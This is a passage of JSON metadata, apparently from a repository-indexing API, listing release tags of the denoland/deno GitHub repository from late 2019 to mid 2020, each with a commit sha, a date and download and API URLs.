releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyst